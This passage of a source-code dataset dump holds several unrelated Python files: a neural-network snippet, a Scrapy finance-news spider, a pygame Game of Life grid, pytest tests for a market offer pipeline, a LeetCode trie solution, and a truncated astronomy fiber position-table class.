(np.dot here would collapse the activation vectors to a scalar)\n        gz3 = np.nan_to_num(a3 * (i3 - a3))\n        gz2 = np.nan_to_num(a2 * (i2 - a2))\n\n        theta3 = np.nan_to_num(np.dot(np.transpose(self.w3), d4))\n        d3 = np.nan_to_num(theta3 * gz3)\n        \n        theta2 = np.nan_to_num(np.dot(np.transpose(self.w2), d3))\n        d2 = np.nan_to_num(theta2 * gz2)\n        \n        return (d2, d3, d4)\n\n    def predict(self, X, type='nonlinear'):\n        predictions = []\n        for sample in X:\n            prediction = self.feedforward(sample,type)[3]\n            predictions.append(prediction)\n        return predictions\n\n    def calculateAccuracy(self, predictions, y):\n        accuracy = 0\n        for prediction, output in zip(predictions, y):\n            l = np.subtract(prediction, output)\n            accuracy += np.count_nonzero(l == 0) / len(prediction)\n        accuracy /= len(predictions)\n        return accuracy\n\n    # Sigmoid activation function: NON LINEAR\n    def sigmoid(self, x):\n        return 1 / (1 + np.exp(-x))\n\n    ","repo_name":"angelica-thd/PatternRecognitionV2","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":4762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"73715555432","text":"# -*- coding: utf-8 -*-\nimport re\nimport scrapy\nfrom fagaiwei.items import FagaiweiItem\nfrom fagaiwei.keyword_others import keyword\nfrom fagaiwei.settings import session, NewsItemInfo\n\n\nclass ZjzxSpider(scrapy.Spider):\n    # Zhongjin Zaixian (China Finance Online, cnfol.com)\n    name = 
'zhongjinzaixian'\n    allowed_domains = ['cnfol.com']\n    start_urls = ['http://news.cnfol.com/', # finance news\n                  'http://stock.cnfol.com/', # stocks\n                  'http://fund.cnfol.com/', # funds\n                  'http://money.cnfol.com/', # personal finance\n                  'http://xg.stock.cnfol.com/' # new shares (IPOs)\n                  ]\n\n    def parse(self, response):\n        url_list = response.xpath(\n            '//div[@class=\"mBlock\"]/div[@class=\"artBlock\"]/a/@href|//*[@id=\"artList\"]/div/a/@href').extract()\n        for url in url_list:\n            result = session.query(NewsItemInfo).filter_by(url=url, web_id=29).count()\n            if result:\n                # print(\"{} already exists\".format(url))\n                pass\n            else:\n                yield scrapy.Request(url, callback=self.process_detail, meta={'web': response.url})\n\n    def process_detail(self, response):\n        item = FagaiweiItem()\n        item['web_id'] = 29\n        item['url'] = response.url\n        item['title'] = ''.join(\n            response.xpath('//div[contains(@class,\"artMain mBlock\")]/h3[@class=\"artTitle\"]/text()').extract())\n        item['web'] = response.meta.get('web')\n        # item['keyword'] = ''\n        news_about = response.xpath('//div[@class=\"artDes\"]/span/text()').extract()\n        webname = news_about[1].split(':')[1]\n        if not webname:\n            webname = response.xpath('//div[@class=\"artDes\"]/span[2]/a/text()').extract_first(default='中金在线')\n        item['webname'] = webname\n        item['pub_time'] = news_about[0]\n        content = '\\n'.join(response.xpath('//div[@class=\"Article\"]/text() | \\\n                                    //div[@class=\"Article\"]/span/text() | \\\n                                    //div[@class=\"Article\"]/a/text()').extract())\n        content = re.sub('\\u3000|\\r\\n|\\n\\n', '', content)\n        item['content'] = content\n        item[\"keyword\"] = keyword.get_keyword(item[\"content\"])\n\n        yield item\n","repo_name":"KKtoNN/python_spider","sub_path":"fagaiwei/fagaiwei/spiders/29zjzx.py","file_name":"29zjzx.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"1192742531","text":"import pygame\n\n\nclass MainGui:\n    def __init__(self):\n        pygame.init()\n        self.WHITE = (250, 250, 250)\n        self.RED = (250, 0, 0)\n        self.BLACK = (0, 0, 0)\n        self.CELL_SIZE = 19\n        self.LINE_SIZE = 1\n        self.CELLS_WIDE = 50\n        self.CELLS_HIGH = 20\n        self.LINES_WIDE = self.CELLS_WIDE + self.LINE_SIZE\n        self.LINES_HIGH = self.CELLS_HIGH + self.LINE_SIZE\n        self.WIDTH = self.LINES_WIDE + self.CELLS_WIDE * self.CELL_SIZE\n        self.HEIGHT = self.LINES_HIGH + self.CELLS_HIGH * self.CELL_SIZE\n        self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))\n\n    def draw_grid(self):\n        for offset in self.get_offset(self.LINES_HIGH):\n            pygame.draw.line(self.screen, self.WHITE, (0, offset), (self.WIDTH, offset))\n        for offset in self.get_offset(self.LINES_WIDE):\n            pygame.draw.line(self.screen, self.WHITE, (offset, 0), (offset, self.HEIGHT))\n        pygame.display.flip()\n\n    def get_offset(self, size):\n        for i in range(size):\n            yield i * (self.CELL_SIZE + self.LINE_SIZE)\n\n    def fill_on_position(self, x, y):\n        start = lambda a: a * (self.CELL_SIZE + self.LINE_SIZE) + self.LINE_SIZE\n        start_x = start(x)\n        start_y = start(y)\n        square = pygame.Rect(start_x, start_y, self.CELL_SIZE, self.CELL_SIZE)\n        pygame.draw.rect(self.screen, self.RED, square)\n        pygame.display.update(square)\n\n    def reset_screen(self):\n        pygame.draw.rect(self.screen, self.BLACK, pygame.Rect(0, 0, self.WIDTH, self.HEIGHT))\n","repo_name":"SamoKopecky/GameOfLife-python","sub_path":"MainGui.py","file_name":"MainGui.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"444610399","text":"# coding: 
utf-8\n\nfrom hamcrest import assert_that\nimport pytest\nfrom datetime import datetime\n\nfrom market.idx.datacamp.proto.offer.DataCampOffer_pb2 import (\n OfferStatus,\n OfferIdentifiers,\n OfferMeta,\n OfferOrderProperties,\n UpdateMeta,\n Flag,\n MARKET_STOCK,\n MARKET_IDX,\n MARKET_ABO,\n BLUE,\n)\nfrom market.idx.datacamp.proto.offer.DataCampOffer_pb2 import Offer as DatacampOffer\nfrom market.idx.datacamp.proto.api.SyncChangeOffer_pb2 import ChangeOfferRequest\nfrom market.idx.datacamp.controllers.piper.yatf.test_env_old import PiperTestEnv\nfrom market.idx.datacamp.controllers.piper.yatf.resources.config_mock import PiperConfigMock\n\nfrom market.idx.yatf.resources.lbk_topic import LbkTopic\nfrom market.idx.yatf.resources.datacamp.datacamp_tables import DataCampServiceOffersTable, DataCampPartnersTable\n\nfrom market.idx.yatf.matchers.yt_rows_matchers import HasOffers\n\nfrom market.pylibrary.proto_utils import message_from_data\nfrom market.idx.datacamp.yatf.utils import create_meta, dict2tskv\nfrom market.idx.pylibrary.datacamp.utils import wait_until\nfrom market.idx.pylibrary.datacamp.conversion import offer_to_service_row\n\nBUSINESS_ID = 1000\nSHOP_ID = 1\nWAREHOUSE_ID = 111\nFEED_ID = 111000\nCREATE_TS = 10\nCURRENT_TS = 500\nFUTURE_TS = 1000\nSS_TS = 700\ntime_pattern = \"%Y-%m-%dT%H:%M:%SZ\"\n\n\n@pytest.fixture(scope='module')\ndef partners_table(yt_server, config):\n SHOPS = [\n {\n 'shop_id': SHOP_ID,\n 'mbi': '\\n\\n'.join([\n dict2tskv({\n 'shop_id': SHOP_ID,\n 'warehouse_id': WAREHOUSE_ID,\n 'datafeed_id': FEED_ID,\n 'business_id': BUSINESS_ID\n }),\n ]),\n 'status': 'publish'\n }\n ]\n\n return DataCampPartnersTable(\n yt_server,\n config.yt_partners_tablepath,\n data=SHOPS\n )\n\n\n@pytest.fixture(scope='module')\ndef actual_service_offers_table(yt_server, config):\n def create_update_meta(source, ts_seconds):\n meta = UpdateMeta()\n meta.source = source\n meta.timestamp.FromSeconds(ts_seconds)\n\n return meta\n\n def create_status(disabled_list):\n status = []\n for disabled in disabled_list:\n status.append(Flag(\n flag=disabled[0],\n meta=create_update_meta(disabled[1], disabled[2])\n ))\n return OfferStatus(disabled=status)\n\n def create_order_properties(order_method, source, ts_seconds):\n return OfferOrderProperties(\n order_method=order_method,\n meta=create_update_meta(source, ts_seconds)\n )\n\n offer_meta = create_meta(CREATE_TS, BLUE)\n\n return DataCampServiceOffersTable(yt_server, config.yt_actual_service_offers_tablepath, data=[\n offer_to_service_row(\n DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.enabled',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.disabled',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.to.be.enabled.and.preorder',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n offer_id='ssku.disabled.in.table.by.other.source.to.be.disabled.by.stock',\n business_id=BUSINESS_ID,\n warehouse_id=WAREHOUSE_ID\n ),\n meta=offer_meta,\n status=create_status([(True, MARKET_ABO, CURRENT_TS)])\n )),\n offer_to_service_row(DatacampOffer(\n identifiers=OfferIdentifiers(\n shop_id=SHOP_ID,\n 
offer_id='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n                business_id=BUSINESS_ID,\n                warehouse_id=WAREHOUSE_ID\n            ),\n            meta=offer_meta,\n            status=create_status([(False, MARKET_STOCK, FUTURE_TS)]),\n            order_properties=create_order_properties(\n                OfferOrderProperties.AVAILABLE_FOR_ORDER,\n                MARKET_STOCK,\n                CURRENT_TS,\n            )\n        )),\n        offer_to_service_row(DatacampOffer(\n            identifiers=OfferIdentifiers(\n                shop_id=SHOP_ID,\n                offer_id='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n                business_id=BUSINESS_ID,\n                warehouse_id=WAREHOUSE_ID\n            ),\n            meta=offer_meta,\n            status=create_status([(False, MARKET_STOCK, FUTURE_TS)]),\n            order_properties=create_order_properties(\n                OfferOrderProperties.AVAILABLE_FOR_ORDER,\n                MARKET_STOCK,\n                CURRENT_TS,\n            )\n        )),\n        offer_to_service_row(DatacampOffer(\n            identifiers=OfferIdentifiers(\n                shop_id=SHOP_ID,\n                offer_id='ssku.disabled.in.table.not.to.be.enabled.and.preorder.with.older.ts',\n                business_id=BUSINESS_ID,\n                warehouse_id=WAREHOUSE_ID\n            ),\n            meta=offer_meta,\n            status=create_status([(True, MARKET_STOCK, CURRENT_TS)]),\n            order_properties=create_order_properties(\n                OfferOrderProperties.AVAILABLE_FOR_ORDER,\n                MARKET_STOCK,\n                FUTURE_TS,\n            )\n        )),\n        offer_to_service_row(DatacampOffer(\n            identifiers=OfferIdentifiers(\n                shop_id=SHOP_ID,\n                offer_id='ssku.with.stock.count',\n                business_id=BUSINESS_ID,\n                warehouse_id=WAREHOUSE_ID\n            ),\n            meta=offer_meta,\n        )),\n    ])\n\n\n@pytest.fixture(scope='module')\ndef ss_topic_data():\n    def make_ss_data(shop_id, offer_id, disabled, preorder, ts, available=None):\n        # NB: Stock storage sends the timestamp in the legacy format (ts_ms)\n        meta = UpdateMeta(\n            source=MARKET_STOCK,\n            ts_ms=ts * 1000\n        )\n\n        offer = DatacampOffer(\n            identifiers=OfferIdentifiers(\n                shop_id=shop_id,\n                offer_id=offer_id,\n                warehouse_id=WAREHOUSE_ID,\n                feed_id=FEED_ID,\n            ),\n            meta=OfferMeta(\n                rgb=BLUE\n            ),\n        )\n\n        if disabled is not None:\n            flag = offer.status.disabled.add()\n            flag.flag = disabled\n            flag.meta.CopyFrom(meta)\n\n        if preorder is not None:\n            order_method = OfferOrderProperties.PRE_ORDERED if preorder else OfferOrderProperties.AVAILABLE_FOR_ORDER\n            offer.order_properties.order_method = order_method\n            offer.order_properties.meta.CopyFrom(meta)\n\n        if available is not None:\n            offer.stock_info.market_stocks.count = available\n            offer.stock_info.market_stocks.meta.CopyFrom(meta)\n\n        return offer\n\n    return [\n        # The offer is disabled by stocks; order properties are set\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.to.be.disabled',\n            disabled=True,\n            preorder=False,\n            ts=SS_TS,\n        ),\n        # The offer is enabled by stocks; order properties are set\n        make_ss_data(\n            shop_id=SHOP_ID,\n            
offer_id='ssku.to.be.enabled',\n            disabled=False,\n            preorder=False,\n            ts=SS_TS,\n        ),\n        # The offer is enabled by stocks; preorder properties are set\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.to.be.enabled.and.preorder',\n            disabled=False,\n            preorder=True,\n            ts=SS_TS,\n        ),\n        # An offer missing from the table is enabled by stocks; preorder properties are set (it is added\n        # to the table with the MARKET_IDX hiding flag set, since it is not ready for indexing)\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.to.be.enabled.but.absent.in.storage',\n            disabled=False,\n            preorder=False,\n            ts=SS_TS,\n        ),\n        # The offer is disabled by stocks; hidings from other sources are kept\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.disabled.in.table.by.other.source.to.be.disabled.by.stock',\n            disabled=True,\n            preorder=False,\n            ts=SS_TS,\n        ),\n        # An offer enabled by stocks must be disabled\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.enabled.in.table.to.be.disabled.and.preorder',\n            disabled=True,\n            preorder=True,\n            ts=SS_TS,\n        ),\n        # An offer disabled by stocks must be enabled\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.disabled.in.table.to.be.enabled.and.preorder',\n            disabled=False,\n            preorder=True,\n            ts=SS_TS,\n        ),\n        # An offer enabled by stocks is not disabled if the timestamp is old\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n            disabled=True,\n            preorder=True,\n            ts=SS_TS,\n        ),\n        # An offer disabled by stocks is enabled, but the preorder does not change because the timestamp is old\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.disabled.in.table.not.to.be.enabled.and.preorder.with.older.ts',\n            disabled=False,\n            preorder=False,\n            ts=SS_TS,\n        ),\n        # An offer with information about the stock count in the warehouse\n        make_ss_data(\n            shop_id=SHOP_ID,\n            offer_id='ssku.with.stock.count',\n            disabled=None,\n            preorder=None,\n            ts=SS_TS,\n            available=5,\n        ),\n    ]\n\n\n@pytest.fixture(scope='session')\ndef stock_storage_topic(log_broker_stuff):\n    topic = LbkTopic(log_broker_stuff)\n    return topic\n\n\n@pytest.fixture(scope='session')\ndef config(yt_server, log_broker_stuff, stock_storage_topic):\n    cfg = {\n        'general': {\n            'color': 'blue',\n        },\n        'logbroker': {\n            'stock_storage_topic': stock_storage_topic.topic,\n        },\n    }\n    return PiperConfigMock(\n        yt_server=yt_server,\n        log_broker_stuff=log_broker_stuff,\n        config=cfg\n    )\n\n\n@pytest.yield_fixture(scope='module')\ndef piper(yt_server, log_broker_stuff, config, stock_storage_topic, actual_service_offers_table, partners_table):\n    resources = {\n        'config': config,\n        'actual_service_offers_table': actual_service_offers_table,\n        'partners_table': partners_table,\n        'stock_storage_topic': stock_storage_topic,\n    }\n    with PiperTestEnv(yt_server, log_broker_stuff, **resources) as piper_env:\n        piper_env.verify()\n        yield piper_env\n\n\n@pytest.yield_fixture(scope='module')\ndef workflow(piper, stock_storage_topic, ss_topic_data):\n    for ss in ss_topic_data:\n        request = ChangeOfferRequest()\n        request.offer.extend([ss])\n        stock_storage_topic.write(request.SerializeToString())\n\n    wait_until(lambda: piper.united_offers_processed >= len(ss_topic_data), timeout=60)\n    wait_until(lambda: piper.stock_storage_processed >= len(ss_topic_data), timeout=60)\n\n\ndef make_expected_dict(ssku, business_id, disabled_list, preorder, available=None, shop_id=None, warehouse_id=None):\n    result = {\n        'identifiers': {\n            'business_id': business_id,\n            'offer_id': ssku,\n        }\n    }\n    if shop_id is not None:\n        
result['identifiers']['shop_id'] = shop_id\n    if warehouse_id is not None:\n        result['identifiers']['warehouse_id'] = warehouse_id\n\n    if disabled_list is not None:\n        result['status'] = {\n            'disabled': [\n                {\n                    'flag': disabled[0],\n                    'meta': {\n                        'source': disabled[1],\n                        'timestamp': datetime.utcfromtimestamp(disabled[2]).strftime(time_pattern)\n                    }\n                } for disabled in disabled_list\n            ]\n        }\n\n    if preorder is not None:\n        result['order_properties'] = {\n            'meta': {\n                'source': MARKET_STOCK,\n                'timestamp': datetime.utcfromtimestamp(preorder[1]).strftime(time_pattern)\n            },\n            'order_method': OfferOrderProperties.PRE_ORDERED if preorder[0]\n            else OfferOrderProperties.AVAILABLE_FOR_ORDER\n        }\n\n    if available is not None:\n        result['stock_info'] = {\n            'market_stocks': {\n                'meta': {\n                    'source': MARKET_STOCK,\n                    'timestamp': datetime.utcfromtimestamp(available[1]).strftime(time_pattern)\n                },\n                'count': available[0]\n            }\n        }\n\n    return result\n\n\n@pytest.mark.parametrize(\"expected\", [\n    make_expected_dict(\n        ssku='ssku.to.be.disabled',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(True, MARKET_STOCK, SS_TS)],\n        preorder=(False, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.to.be.enabled',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(False, MARKET_STOCK, SS_TS)],\n        preorder=(False, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.to.be.enabled.and.preorder',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(False, MARKET_STOCK, SS_TS)],\n        preorder=(True, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.disabled.in.table.by.other.source.to.be.disabled.by.stock',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(True, MARKET_STOCK, SS_TS), (True, MARKET_ABO, CURRENT_TS)],\n        preorder=(False, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.enabled.in.table.to.be.disabled.and.preorder',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(True, MARKET_STOCK, SS_TS)],\n        preorder=(True, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.disabled.in.table.to.be.enabled.and.preorder',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(False, MARKET_STOCK, SS_TS)],\n        preorder=(True, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.enabled.in.table.not.to.be.disabled.with.older.ts.and.preorder',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(False, MARKET_STOCK, FUTURE_TS)],\n        preorder=(True, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.disabled.in.table.not.to.be.enabled.and.preorder.with.older.ts',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(False, MARKET_STOCK, SS_TS)],\n        preorder=(False, FUTURE_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.to.be.enabled.but.absent.in.storage',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(False, MARKET_STOCK, SS_TS), (True, MARKET_IDX, SS_TS)],\n        preorder=(False, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.with.stock.count',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=None,\n        preorder=None,\n        available=(5, SS_TS),\n    ),\n])\ndef test_stock_storage_update_offer(workflow, piper, expected):\n    \"\"\"\n    Check that piper reads stocks from the topic and correctly updates/creates the offers\n    \"\"\"\n    
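# message_from_data renders each expected dict above into a DatacampOffer proto; HasOffers then asserts it appears among the rows piper wrote to the table.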
assert_that(piper.actual_service_offers_table.data, HasOffers([message_from_data(expected, DatacampOffer())]))\n\n\n@pytest.mark.parametrize(\"expected\", [\n    make_expected_dict(\n        ssku='ssku.to.be.disabled',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=[(True, MARKET_STOCK, SS_TS)],\n        preorder=(False, SS_TS),\n    ),\n    make_expected_dict(\n        ssku='ssku.with.stock.count',\n        business_id=BUSINESS_ID,\n        shop_id=SHOP_ID,\n        warehouse_id=WAREHOUSE_ID,\n        disabled_list=None,\n        preorder=None,\n        available=(5, SS_TS),\n    ),\n])\ndef test_stock_storage_create_united_offer(workflow, piper, expected):\n    \"\"\"\n    Check that piper:\n    - creates offers with the hiding flag and preorder in ActualServiceOffers\n    - creates an empty offer in BasicOffers\n    - creates offers in ServiceOffers\n    \"\"\"\n    assert_that(piper.service_offers_table.data, HasOffers([message_from_data({\n        'identifiers': {\n            'business_id': BUSINESS_ID,\n            'shop_id': SHOP_ID,\n            'offer_id': expected['identifiers']['offer_id'],\n        }\n    }, DatacampOffer())]))\n    assert_that(piper.actual_service_offers_table.data, HasOffers([message_from_data(\n        expected, DatacampOffer())]))\n    assert_that(piper.basic_offers_table.data, HasOffers([message_from_data({\n        'identifiers': {\n            'business_id': BUSINESS_ID,\n            'offer_id': expected['identifiers']['offer_id'],\n        },\n        'status': {\n            'disabled': [],\n        },\n    }, DatacampOffer())]))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/tests/test_stock_storage.py","file_name":"test_stock_storage.py","file_ext":"py","file_size_in_byte":20095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"8551509126","text":"# https://leetcode.com/problems/design-add-and-search-words-data-structure/\n\nclass TrieNode:\n    def __init__(self):\n        self.children = {}\n        self.end = False\nclass WordDictionary:\n    def __init__(self):\n        self.root = TrieNode()\n\n    def addWord(self, word: str) -> None:\n        curr = self.root\n\n        for c in word:\n            if c not in curr.children:\n                curr.children[c] = TrieNode()\n\n            curr = curr.children[c]\n\n        curr.end = True\n\n    def search(self, word: str) -> bool:\n        def dfs(root, word):\n            curr = root\n\n            for i, c in enumerate(word):\n                if c == '.':\n                    for child in curr.children.values():\n                        if dfs(child, word[i + 1:]):  # dfs(child, word[1:]) would be wrong: c moves with the loop index i,\n                            return True               # while word stays the same, so the slice must start at i + 1.\n                    return False\n                else:\n                    if c not in curr.children:\n                        return False\n\n                    curr = curr.children[c]\n\n            return curr.end\n\n        return dfs(self.root, word)\n\n\n# Your WordDictionary object will be instantiated and called as such:\n# obj = WordDictionary()\n# obj.addWord(word)\n# param_2 = obj.search(word)","repo_name":"jeffreytigerwang/Python-Practice","sub_path":"medium/Design Add and Search Words Data Structure.py","file_name":"Design Add and Search Words Data Structure.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"2787955660","text":"import numpy\nfrom astropy.io import fits as pyfits\n\n\nclass PositionTable(object):\n    def __init__(\n        self,\n        shape=None,\n        size=None,\n        arc_position_x=None,\n        arc_position_y=None,\n        good_fibers=None,\n        fiber_type=None,\n    ):\n        if shape is None:\n            self._shape = None\n        else:\n            self._shape = shape\n\n        if size is None:\n            self._size = None\n        else:\n            self._size = size\n\n        if arc_position_x is None:\n            self._arc_position_x = None\n        
else:\n            self._arc_position_x = numpy.array(arc_position_x)\n\n        if arc_position_y is None:\n            self._arc_position_y = None\n        else:\n            self._arc_position_y = numpy.array(arc_position_y)\n\n        if good_fibers is None:\n            self._good_fibers = None\n        else:\n            self._good_fibers = numpy.array(good_fibers)\n\n        try:\n            self._fiber_type = numpy.array(fiber_type)\n        except Exception:\n            self._fiber_type = None\n\n    def loadTxtPosTab(self, file):\n        dat = open(file, \"r\")\n        lines = dat.readlines()\n        dat.close()\n        line = lines[0].split()\n        self._shape = line[0]\n        self._size = (float(line[1]), float(line[2]))\n        fibers = len(lines) - 1\n        pos_x = numpy.zeros(fibers, dtype=numpy.float32)\n        pos_y = numpy.zeros(fibers, dtype=numpy.float32)\n        good = numpy.zeros(fibers, dtype=numpy.uint8)\n        if len(lines[1].split()) > 4:\n            fiber_type = numpy.empty(fibers, dtype=\"|S3\")\n        for i in range(1, fibers + 1):\n            line = lines[i].split()\n            pos_x[i - 1] = float(line[1])\n            pos_y[i - 1] = float(line[2])\n            good[i - 1] = int(line[3])\n            if len(line) > 4:\n                fiber_type[i - 1] = line[4]\n        self._arc_position_x = pos_x\n        self._arc_position_y = pos_y\n        self._good_fibers = good\n        if len(line) > 4:\n            self._fiber_type = fiber_type\n\n    def writeTxtPosTab(self, file, fiber_type=False):\n        dat = open(file, \"w\")\n        print(\"%s %.2f %.2f %i\" % (self._shape, self._size[0], self._size[1], 0), file=dat)\n        for i in range(len(self._arc_position_x)):\n            if fiber_type:\n                print(\"%i %.2f %.2f %i %s\" % (\n                    i + 1,\n                    self._arc_position_x[i],\n                    self._arc_position_y[i],\n                    self._good_fibers[i],\n                    self._fiber_type[i],\n                ), file=dat)\n            else:\n                print(\"%i %.2f %.2f %i\" % (\n                    i + 1,\n                    self._arc_position_x[i],\n                    self._arc_position_y[i],\n                    self._good_fibers[i],\n                ), file=dat)\n        # print(\"%i %.2f %.2f %i\" % (i + 1, self._arc_position_x[i], self._arc_position_y[i], self._good_fibers[i]), file=dat)\n        # print(\"%i %.2f %.2f\" % (i + 1, self._arc_position_x[i], self._arc_position_y[i]), file=dat)\n        dat.close()\n\n    def writeFitsPosTable(self):\n        columns = []\n        columns.append(\n            pyfits.Column(\n                name=\"X_Position\",\n                unit=\"arcsec\",\n                format=\"E\",\n                array=self._arc_position_x.astype(\"float32\"),\n            )\n        )\n        columns.append(\n            pyfits.Column(\n                name=\"Y_Position\",\n                unit=\"arcsec\",\n                format=\"E\",\n                array=self._arc_position_y.astype(\"float32\"),\n            )\n        )\n        columns.append(\n            pyfits.Column(\n                name=\"GoodFiber\", unit=\"flag\", format=\"I\", array=self._good_fibers\n            )\n        )\n        columns.append(\n            pyfits.Column(name=\"FiberType\", format=\"3A\", array=self._fiber_type)\n        )\n        try:\n            table = pyfits.new_table(columns)\n        except AttributeError:\n            table = pyfits.BinTableHDU.from_columns(columns)\n        try:\n            table.header.update(\n                \"FibShape\", self._shape, \"Shape of the fiber (C-Circular, S-Square)\"\n            )\n            table.header.update(\n                \"FibSizeX\", self._size[0], \"Size of the fiber in x-direction\"\n            )\n            table.header.update(\n                \"FibSizeY\", self._size[1], \"Size of the fiber in y-direction\"\n            )\n        except ValueError:\n            table.header[\"FibShape\"] = (\n                self._shape,\n                \"Shape of the fiber (C-Circular, S-Square)\",\n            )\n            table.header[\"FibSizeX\"] = (\n                self._size[0],\n                \"Size of the fiber in x-direction\",\n            )\n            table.header[\"FibSizeY\"] = (\n                self._size[1],\n                \"Size of the fiber in y-direction\",\n            )\n        return table\n\n    def loadFitsPosTable(self, table):\n        data = table.data\n        header = table.header\n        self._arc_position_x = data.field(\"X_Position\")\n        self._arc_position_y = data.field(\"Y_Position\")\n        self._good_fibers = data.field(\"GoodFiber\")\n        self._fiber_type = data.field(\"FiberType\")\n        self._shape = header[\"FibShape\"]\n        
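# FibShape/FibSizeX/FibSizeY read back the same header keywords that writeFitsPosTable writes above.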
self._size = (header[\"FibSizeX\"], header[\"FibSizeY\"])\n\n    def append(self, pos_tab):\n        self._arc_position_x = numpy.concatenate((self._arc_position_x, pos_tab._arc_position_x))\n        self._arc_position_y = numpy.concatenate((self._arc_position_y, pos_tab._arc_position_y))\n        self._good_fibers = numpy.concatenate((self._good_fibers, pos_tab._good_fibers))\n        if self._fiber_type is not None and pos_tab._fiber_type is not None:\n            self._fiber_type = numpy.concatenate((self._fiber_type, pos_tab._fiber_type))\n\n    def offsetPosTab(self, offset_x, offset_y):\n        self._arc_position_x = self._arc_position_x + offset_x\n        self._arc_position_y = self._arc_position_y + offset_y\n\n    def rotatePosTab(self, angle, ref_cent_x=0.0, ref_cent_y=0.0):\n        arc_position_x = (self._arc_position_x - ref_cent_x) * numpy.cos(\n            float(angle) / 180.0 * numpy.pi\n        ) - (self._arc_position_y - ref_cent_y) * numpy.sin(\n            float(angle) / 180.0 * numpy.pi\n        )\n        arc_position_y = (self._arc_position_x - ref_cent_x) * numpy.sin(\n            float(angle) / 180.0 * numpy.pi\n        ) + (self._arc_position_y - ref_cent_y) * numpy.cos(\n            float(angle) / 180.0 * numpy.pi\n        )\n        posTab_new = PositionTable(\n            shape=self._shape,\n            size=self._size,\n            arc_position_x=arc_position_x,\n            arc_position_y=arc_position_y,\n            good_fibers=self._good_fibers,\n            fiber_type=self._fiber_type,\n        )\n        return posTab_new\n\n    def scalePosTab(self, scale):\n        position_x = self._arc_position_x * scale\n        position_y = self._arc_position_y * scale\n        size = [self._size[0] * scale, self._size[1] * scale]\n        posTab_new = PositionTable(\n            shape=self._shape,\n            size=size,\n            arc_position_x=position_x,\n            arc_position_y=position_y,\n            good_fibers=self._good_fibers,\n            fiber_type=self._fiber_type,\n        )\n        return posTab_new\n\n    def distance(self, x_ref, y_ref):\n        distance = numpy.sqrt(\n            (x_ref - self._arc_position_x) ** 2 + (y_ref - self._arc_position_y) ** 2\n        )\n        return distance\n\n    def setPosTab(self, PosTab):\n        self._arc_position_x = PosTab._arc_position_x\n        self._arc_position_y = PosTab._arc_position_y\n        self._good_fibers = 